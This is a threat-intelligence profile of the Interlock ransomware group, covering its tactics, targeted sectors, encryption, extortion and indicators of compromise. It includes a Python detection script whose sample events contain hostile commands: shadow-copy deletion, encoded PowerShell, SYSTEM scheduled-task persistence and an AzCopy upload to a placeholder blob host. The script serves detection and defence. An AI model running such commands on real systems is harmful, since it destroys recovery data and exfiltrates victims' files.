THREAT ACTOR: Interlock

Threat Level: 7.1
Emergence Date: Sep 2024
Category: Closed Group
Affiliations: Suspected connections to Rhysida ransomware operation based on technical similarities and operational timing

Description

Interlock emerged in September 2024 as a cyber extortion operation targeting critical infrastructure across North America and Europe through uncommon attack methods. The group has compromised over 80 organizations in less than one year, demonstrating high technical maturity through cross-platform malware variants, custom tooling, and virtual-machine-focused encryption strategies that bypass traditional security defenses.

Operating as a closed collective likely derived from the Rhysida ransomware family, the operation relies on drive-by downloads, ClickFix/FileFix social engineering, and Azure-based data exfiltration in methodical 17-day attack timelines. Despite its recent emergence, the FBI considered the threat serious enough to warrant Joint Cybersecurity Advisory AA25-203A in July 2025, though no arrests or enforcement actions have occurred to date.

Criticality: Assesses the importance of the potential target, including its size/scale, the value of its data, and operational impact.
Lethality: Evaluates the potential for damage from the attack, including the ability to disrupt operations, cause financial loss, and damage public brand image.
Aggressiveness: Assesses the psychological and tactical intensity of the group's behavior, including targeted harassment, violent language, blackmail, and political motives.

Classifications & Affiliations

Type: Closed Group

The operation functions as a closed group without traditional affiliate recruitment or public advertising. The FBI/CISA joint advisory confirms that the group does not operate as a traditional RaaS but as a closed operation. Federal agencies assess the actors as financially motivated and opportunistic, selecting victims based on opportunity rather than specific strategic criteria. The group's smaller victim count is consistent with a closed, private operational structure.

Current Status: Highly active with continuous operations and tactical evolution as of October 2025

Threat Level: 7.1

Origins and Methodology

The operation emerged with rare cross-platform capabilities spanning Windows, Linux, and FreeBSD variants, setting it apart through uncommon drive-by download initial access methods that bypass traditional phishing-focused security awareness. The group pioneered a VM-focused encryption strategy that targets virtual machines while frequently leaving physical hosts, workstations, and servers unaffected, recognizing that many organizations run critical applications in virtualized environments.

Their methodology relies on methodical 17-day attack timelines from initial compromise to encryption deployment, allowing extensive reconnaissance, credential harvesting, lateral movement, and data exfiltration before encryption triggers incident response. The operation combines drive-by compromise through compromised WordPress sites in the TAG-124 Traffic Distribution System, ClickFix/FileFix social engineering, and Azure-native exfiltration at speeds up to 300 Mbps, demonstrating continuous tactical innovation throughout 2024-2025.

What is the Evolution of Interlock Ransomware?
1. Formation

Initial emergence in late September 2024 coincided with established ransomware ecosystem disruptions affecting major operations like LockBit, creating opportunities for new actors.

Building on suspected Rhysida codebase and operational foundations, the group focused on establishing technical capabilities through LibTomCrypt library implementation and cross-platform development. The operation showed immediate maturity with FreeBSD variant development and comprehensive PowerShell backdoor infrastructure reaching version 11 by Q4 2024.

2. Evolution

Initial months following emergence (September-October 2024) featured basic fake Chrome/Edge updaters and earliest public malware submissions.

Around January 2025, ClickFix social engineering integration introduced fake CAPTCHA verification prompts executing malicious Base64-encoded PowerShell commands. Current operations since February 2025 added Berserk Stealer and Lumma Stealer information theft tools, NodeSnake RAT deployment with PHP-based variants (March 2025), and FileFix technique adoption with widespread PHP RAT distribution abusing Cloudflare Tunnel infrastructure (June 2025).

3. Lineage/Connections

Intelligence assessments note suspected attribution connections based on shared crypter infrastructure and operational parallels spanning BlackCat/ALPHV (attack structure, partial encryption techniques, backup infrastructure targeting), LockBit (operational themes, recovery sabotage emphasis), and Rhysida (technical similarities and operational timing).

Which Unique Techniques Does Interlock Use?

Interlock uses multi-stage attack chains that draw on both custom tools and legitimate administrative software to achieve comprehensive network compromise. What sets the operation apart is its rare combination of drive-by compromise initial access and VM-focused encryption capabilities.

Infection Vectors: Drive-by downloads compromising legitimate websites with KongTuke/LandUpdate808 injection using single-line JavaScript hidden in HTML; IP filtering to target specific geographic regions; ClickFix fake CAPTCHA manipulation prompting users to execute Base64-encoded PowerShell commands; FileFix File Explorer address bar exploitation; VPN credential brute-forcing with MFA fatigue attack integration.

Target Selection: Opportunistic attacks with sectoral patterns revealing healthcare and critical infrastructure emphasis; concentrated targeting of healthcare systems for maximum disruption leverage alongside government entities, defense contractors, manufacturing operations, and education institutions across North America (primary focus) and Europe (secondary targeting).

Operational Complexity: Multi-stage attack chains with 17-day average dwell times for extensive reconnaissance; TAG-124 Traffic Distribution System using 100+ compromised WordPress sites; custom NodeSnake RAT and PHP RAT variants; BYOVD techniques deploying signed vulnerable drivers; Azure-native exfiltration at speeds up to 300 Mbps; FreeBSD support representing rare cross-platform capability.

Key Features & Technical Details

Technical architecture represents advanced ransomware engineering with cross-platform capabilities and VM-focused encryption designed to maximize impact while evading defensive countermeasures.

Encryption Method: AES-256 in CBC or GCM modes with RSA-4096 for key protection; multi-threaded operation with twice as many encryption threads as file search threads, based on CPU core count.

File Extension: .interlock or .!NT3R10CK appended to encrypted files.

Ransom Note: Evolved from !README!.txt to FIRST_READ_ME.txt to QUICK_GUIDE.txt, with increasing emphasis on legal violations citing GDPR, HIPAA, CCPA, GLBA, and NYDFS compliance failures.

Double Extortion: AzCopy data upload to Azure storage blobs at speeds up to 300 Mbps per blob; average 1.47 TB stolen per victim.

Communication Channels: "Worldwide Secrets Blog" data leak site on the Tor network; victim-specific dedicated Tor domains; contact email interlock@2mail.xx.

Deployment Speed: Methodical 17-day average from initial compromise to encryption deployment, allowing extensive reconnaissance and data exfiltration.

Payment Method: Bitcoin payments via unique wallet addresses provided post-contact through .onion negotiation portals.

Operational Model: Closed group without traditional affiliate recruitment; quality-over-quantity strategy focusing on high-value targets.

Activities

The group has maintained active operational status from its September 2024 emergence through October 2025, with continuous victim claims on its data leak sites and no enforcement disruptions observed; it expanded from 24 victims through Q1 2025 to 60+ by mid-2025. Operational tempo shows steady expansion, with FBI investigations ongoing through June 2025, though zero arrests, infrastructure takedowns, or sanctions have occurred to date, indicating a monitoring phase typical for recently emerged threats before comprehensive enforcement actions materialize.

Which Industries Are Most Vulnerable to Interlock?

Primary targeting concentrates on healthcare systems (documented incidents affecting thousands of patients), critical infrastructure, government entities (municipal and federal operations), defense contractors (classified supply chain data theft with national security implications), manufacturing, education, technology, financial services, professional services, and transportation sectors, with a predominantly North American geographic focus and secondary European expansion in Italy, Germany, the United Kingdom, France, and Spain.

Modus Operandi

Comprehensive attack methodologies integrate technical capabilities with strategic operational security, enabling systematic network compromise across enterprise environments.

Initial Access

Drive-by Compromise (T1189): Compromising legitimate websites with KongTuke/LandUpdate808 injection using single-line JavaScript hidden in HTML; IP filtering to target specific geographic regions; fake browser and security software update delivery. User Execution: Malicious File (T1204.002): ClickFix fake CAPTCHA manipulation prompting users to execute Base64-encoded PowerShell commands; FileFix File Explorer address bar exploitation; clipboard manipulation for payload delivery.

Valid Accounts (T1078): Pre-acquired credentials from Initial Access Brokers through underground marketplaces like ru-market; credentials from earlier infostealer campaigns or compromised enterprise systems.

Discovery

System Owner/User Discovery (T1033): WindowsIdentity.GetCurrent() for user identification and privilege assessment. System Information Discovery (T1082): systeminfo command execution; Get-PSDrive for drive and share discovery; hardware and software inventory collection. System Service Discovery (T1007): tasklist /svc for service enumeration; Get-Service for comprehensive service discovery.

System Network Configuration Discovery (T1016): arp -a for network configuration discovery; IP address and network topology enumeration. Network Service Scanning (T1046): Angry IP Scanner and Nmap deployment to discover internal hosts and enumerate open ports.

Tool Deployment and Command and Control

Remote Access Software (T1219): AnyDesk, PuTTY, ScreenConnect (cracked versions) for remote connectivity; fake browser update RAT deployment. Ingress Tool Transfer (T1105): Credential stealer and keylogger download; secondary payload delivery.

Application Layer Protocol (T1071): Cloudflare Tunnel services abuse with TryCloudflare subdomains for communication masking. Proxy (T1090): SystemBC proxy deployment.

Defense Evasion

Masquerading (T1036.005): conhost.exe encryption binary disguising as Windows Console Host; "Chrome Updater" registry entries mimicking legitimate software. System Binary Proxy Execution: Rundll32 (T1218.011): rundll32.exe executing tmp41.wasd DLL; PHP RAT execution via rundll32 with .png files. Indicator Removal on Host: Clear Windows Event Logs (T1070.001): Systematic deletion of system and security logs from infected hosts.

Impair Defenses: Disable or Modify Tools (T1562.001): BYOVD techniques deploying signed but vulnerable kernel-mode drivers to disable security software; GPO changes and PowerShell scripts disabling antivirus services. Indicator Removal on Host: Timestomp (T1070.006): Altering file metadata to make malicious actions appear at earlier or innocuous times.

Credential Access

Credentials from Password Stores: Credentials from Web Browsers (T1555.003): Systematic browser credential extraction and saved password harvesting. Input Capture: Keylogging (T1056.001): klg.dll keylogger deployment logging keystrokes to conhost.txt files. OS Credential Dumping: LSASS Memory (T1003.001): LSASS memory dumps to capture active session credentials.

OS Credential Dumping: NTDS (T1003.003): Domain credential harvesting. Unsecured Credentials (T1552): Custom cht.exe credential stealer for harvesting.

Command and Control Infrastructure

Tor-based communication infrastructure via Ingress Tool Transfer (T1105) with encrypted channels; Cloudflare Tunnel abuse with dynamically generated TryCloudflare subdomains for ephemeral, legitimate-appearing proxy domains; multiple C2 server rotation for operational resilience.

Lateral Movement

Valid Accounts (T1078): Compromised credential abuse for system access; domain account utilization for lateral movement. Remote Desktop Protocol (T1021.001): RDP connections using compromised credentials; remote system access for malware deployment.

System Services: Service Execution (T1569.002): PSExec and Windows scheduled tasks for payload propagation.

Exfiltration

Exfiltration to Cloud Storage (T1567.002): AzCopy data upload to Azure storage blobs at high speeds up to 300 Mbps per blob. Data from Cloud Storage Object (T1530): Azure Storage Explorer for cloud data access and navigation.

Exfiltration Over Alternative Protocol (T1048): WinSCP for secure file transfer protocol abuse.

Persistence

Registry Run Keys/Startup Folder (T1547.001): Registry Run Key creation with "Chrome Updater" value at HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run; file placement in %AppData%\Microsoft\Windows\Start Menu\Programs\Startup.

Scheduled Task (T1053.005): TaskSystem executing daily at 20:00 using System account privileges; WindowsUpdateSync maintaining persistence through Base64-encoded payload execution.

Operational Impact

Organization-wide system encryption causing operational disruption with VM-focused targeting allowing for rapid compromise; comprehensive backup destruction creating recovery challenges with 3-week timelines to restore core services in documented incidents; critical service interruption including EHR systems offline, elective procedures cancelled, and revenue collection impairment.

Impact

Data Encrypted for Impact (T1486): AES-CBC with RSA encryption for file encryption; cross-platform encryptor deployment; multi-threaded encryption for operational efficiency. Inhibit System Recovery (T1490): Removal of backup files and deletion of Volume Shadow Copies using vssadmin or diskshadow.

Disk Wipe: Disk Content Wipe (T1561.001): Destructive actions preventing recovery.

Extortion

Ransom demands range from hundreds of thousands to millions depending on victim size and impact, with 96-hour (4-day) response deadlines from the encryption event. Ransom notes increasingly emphasize legal violations, citing GDPR, HIPAA, CCPA, GLBA, and NYDFS Cybersecurity Regulation compliance failures, with warnings highlighting "severe fines for non-compliance and lawsuits from affected parties" and 72-hour extended warnings before data publication.

Tor-based negotiation platforms provide victims with unique 60-character alphanumeric Company IDs for communication.

Anti-Forensics

Volume shadow copy deletion through Inhibit System Recovery (T1490); comprehensive backup system targeting; log destruction for evidence elimination; anti-forensics implementation including time stomping and metadata alteration.

Indicators of Compromise (IOCs)

Operations generate distinctive technical indicators across file systems, network infrastructure, and behavioral patterns that enable detection and attribution of compromise activities.


Domains/URLs

TryCloudflare pattern with dynamically generated trycloudflare.com subdomains for Cloudflare Tunnel abuse

File Paths

%AppData%\Microsoft\Windows\Start Menu\Programs\Startup (Dropped files for execution on user login)
%AppData%\Roaming (PHP RAT deployment directory)
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run ("Chrome Updater" value for automatic startup execution)

File Extensions

.interlock (encrypted file extension)
.!NT3R10CK (encrypted file extension variant)
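As an added example (not code from the profile above or from the FBI/CISA advisory), the following Python script turns the behaviours listed in the Modus Operandi and IOC sections (the "Chrome Updater" Run key, the TaskSystem/WindowsUpdateSync scheduled tasks, Base64-encoded PowerShell, shadow-copy deletion, AzCopy uploads, rundll32 abuse, the encrypted-file extensions and the ransom note names) into detection rules and runs them over constructed Sysmon-style events. The event shape, rule names and all sample values are assumptions made for this example.

```python
import re

# Detection rules distilled from the Interlock profile above. Each rule is
# (rule name, event type it applies to, regex applied to the event's text).
# Event types and the Sysmon-like event shape are assumptions for this example.
RULES = [
    ("Run key 'Chrome Updater' (T1547.001)", "registry",
     re.compile(r"\\CurrentVersion\\Run\\Chrome Updater$", re.I)),
    ("scheduled task TaskSystem/WindowsUpdateSync (T1053.005)", "process",
     re.compile(r'schtasks(\.exe)?\s.*/tn\s+"?(TaskSystem|WindowsUpdateSync)\b', re.I)),
    ("encoded PowerShell, ClickFix/FileFix style (T1204.002)", "process",
     re.compile(r"powershell(\.exe)?\s.*\s-(e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I)),
    ("shadow copy deletion (T1490)", "process",
     re.compile(r"vssadmin(\.exe)?\s+delete\s+shadows|diskshadow(\.exe)?\b", re.I)),
    ("AzCopy upload to Azure blob storage (T1567.002)", "process",
     re.compile(r"azcopy(\.exe)?\s+copy\s.*blob\.core\.windows\.net", re.I)),
    ("rundll32 loading .png/.wasd artefact (T1218.011)", "process",
     re.compile(r"rundll32(\.exe)?\s+.*\.(png|wasd)\b", re.I)),
    ("encrypted-file extension or ransom note", "file",
     re.compile(r"(\.interlock|\.!NT3R10CK)$|(^|\\)(!README!|FIRST_READ_ME|QUICK_GUIDE)\.txt$", re.I)),
    ("keylogger artefact klg.dll / conhost.txt (T1056.001)", "file",
     re.compile(r"(^|\\)(klg\.dll|conhost\.txt)$", re.I)),
]

# Constructed sample events (not real telemetry): the first nine mirror the
# behaviours described in the profile, the last three are benign look-alikes.
SAMPLE_EVENTS = [
    {"type": "registry", "text": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Chrome Updater"},
    {"type": "process", "text": r'schtasks.exe /create /tn "TaskSystem" /sc daily /st 20:00 /ru SYSTEM /tr C:\ProgramData\conhost.exe'},
    {"type": "process", "text": "powershell.exe -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"},
    {"type": "process", "text": "vssadmin.exe delete shadows /all /quiet"},
    {"type": "process", "text": "azcopy.exe copy D:\\share https://example.blob.core.windows.net/c?sv=PLACEHOLDER --recursive"},
    {"type": "process", "text": r"rundll32.exe C:\Users\u\AppData\Roaming\update.png,Start"},
    {"type": "file", "text": r"C:\Data\finance.xlsx.interlock"},
    {"type": "file", "text": r"C:\Users\u\Desktop\QUICK_GUIDE.txt"},
    {"type": "file", "text": r"C:\Users\u\AppData\Roaming\conhost.txt"},
    {"type": "process", "text": "powershell.exe -NoProfile -Command Get-Service"},
    {"type": "registry", "text": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\OneDrive"},
    {"type": "file", "text": r"C:\Users\u\Documents\notes.txt"},
]


def scan(events):
    """Return a list of (rule name, event text) for every event matching a rule.
    Several distinct rules firing on one host is the chain the profile describes:
    persistence, recovery inhibition, exfiltration and finally encryption."""
    hits = []
    for ev in events:
        for name, etype, rx in RULES:
            if ev["type"] == etype and rx.search(ev["text"]):
                hits.append((name, ev["text"]))
    return hits


if __name__ == "__main__":
    for name, text in scan(SAMPLE_EVENTS):
        print(f"[{name}] {text}")
```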

Exploits and Vulnerabilities

CVE-2024-21407 (CVSS 8.1), Windows Kernel Privilege Escalation: Critical Windows Kernel privilege escalation flaw weaponized post-initial access to gain SYSTEM privileges.

Additional Attack Vectors: Unpatched VPNs via credential brute-forcing and MFA fatigue attacks; Microsoft Exchange server exploitation; targeting of internet-facing applications; ClickFix/FileFix social engineering techniques that bypass phishing-focused security awareness; drive-by downloads from compromised legitimate websites using the TAG-124 Traffic Distribution System with 100+ compromised WordPress sites; and BYOVD techniques using signed vulnerable kernel-mode drivers to disable security software.